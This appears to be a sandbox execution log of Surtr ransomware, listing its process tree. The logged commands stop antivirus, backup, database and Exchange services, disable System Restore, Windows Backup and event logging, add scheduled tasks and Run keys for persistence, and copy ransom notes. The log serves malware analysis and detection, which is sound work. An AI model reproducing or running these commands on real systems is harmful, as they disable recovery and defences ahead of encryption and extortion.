C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"3⤵
-
C:\Windows\system32\net.exenet stop "MMS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"3⤵
-
C:\Windows\system32\net.exenet stop "mozyprobackup"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeES"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
[4] C:\Windows\system32\net.exe | net stop "MSExchangeMTA"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeMTA"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
[4] C:\Windows\system32\net.exe | net stop "MSExchangeSA"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeSA"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
[4] C:\Windows\system32\net.exe | net stop "MSExchangeSRS"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeSRS"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
[4] C:\Windows\system32\net.exe | net stop "MSOLAP$SQL_2008"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
[4] C:\Windows\system32\net.exe | net stop "MSOLAP$SYSTEM_BGC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
[4] C:\Windows\system32\net.exe | net stop "MSOLAP$TPS"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$TPS"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
[4] C:\Windows\system32\net.exe | net stop "MSOLAP$TPSAMA"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$BKUPEXEC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  - Drops startup file
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  - Drops startup file
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$ECWDB2"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$PRACTICEMGT"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$PRACTTICEBGC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
[4] C:\Windows\system32\attrib.exe | attrib +R /S "C:\ProgramData\Service"
  - Views/modifies file attributes
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$SHAREPOINT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$SYSTEM_BGC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
[4] C:\Windows\system32\net.exe | net stop "MSSQL$VEEAMSQL2012"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$SBSMONITORING"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$SHAREPOINT"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$SQL_2008"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$SYSTEM_BGC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$TPS"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
[4] C:\Windows\system32\net.exe | net stop "MSSQLFDLauncher$TPSAMA"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
[4] C:\Windows\system32\net.exe | net stop "MSSQLSERVER"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLSERVER"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
[4] C:\Windows\system32\net.exe | net stop "MSSQLServerADHelper100"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
[4] C:\Windows\system32\attrib.exe | attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
  - Views/modifies file attributes
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
[4] C:\Windows\system32\net.exe | net stop "MSSQLServerOLAPService"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MySQL80"
[4] C:\Windows\system32\net.exe | net stop "MySQL80"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MySQL80"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
[4] C:\Windows\system32\schtasks.exe | schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  - Creates scheduled task(s)
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MySQL57"
[4] C:\Windows\system32\net.exe | net stop "MySQL57"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MySQL57"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
[4] C:\Windows\system32\net.exe | net stop "OracleClientCache80"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "OracleClientCache80"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
[4] C:\Windows\system32\net.exe | net stop "PDVFSService"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "PDVFSService"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
[4] C:\Windows\system32\net.exe | net stop "POP3Svc"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "POP3Svc"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "ReportServer"
[4] C:\Windows\system32\net.exe | net stop "ReportServer"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "ReportServer"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
[4] C:\Windows\system32\net.exe | net stop "ReportServer$SQL_2008"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
[4] C:\Windows\system32\net.exe | net stop "ReportServer$SYSTEM_BGC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
[4] C:\Windows\system32\net.exe | net stop "ReportServer$TPS"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "ReportServer$TPS"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
[4] C:\Windows\system32\net.exe | net stop "ReportServer$TPSAMA"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "RESvc"
[4] C:\Windows\system32\net.exe | net stop "RESvc"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "RESvc"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "sacsvr"
[4] C:\Windows\system32\net.exe | net stop "sacsvr"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "sacsvr"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SamSs"
[4] C:\Windows\system32\net.exe | net stop "SamSs"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
[4] C:\Windows\system32\net.exe | net stop "SAVAdminService"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SAVAdminService"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
[4] C:\Windows\system32\schtasks.exe | schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  - Creates scheduled task(s)
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SAVService"
[4] C:\Windows\system32\net.exe | net stop "SAVService"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SAVService"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "Smcinst"
[4] C:\Windows\system32\net.exe | net stop "Smcinst"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Smcinst"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SmcService"
[4] C:\Windows\system32\net.exe | net stop "SmcService"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SmcService"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
[4] C:\Windows\system32\net.exe | net stop "SMTPSvc"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SMTPSvc"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SNAC"
[4] C:\Windows\system32\net.exe | net stop "SNAC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SNAC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SntpService"
[4] C:\Windows\system32\net.exe | net stop "SntpService"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SntpService"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  - Drops startup file
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "sophossps"
[4] C:\Windows\system32\net.exe | net stop "sophossps"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "sophossps"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  - Adds Run key to start application
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
[4] C:\Windows\system32\net.exe | net stop "SQLAgent$BKUPEXEC"
[5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  - Adds Run key to start application
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
[4] C:\Windows\system32\reg.exe | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  - Adds Run key to start application
[3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
[4] C:\Windows\system32\net.exe | net stop "SQLAgent$ECWDB2"
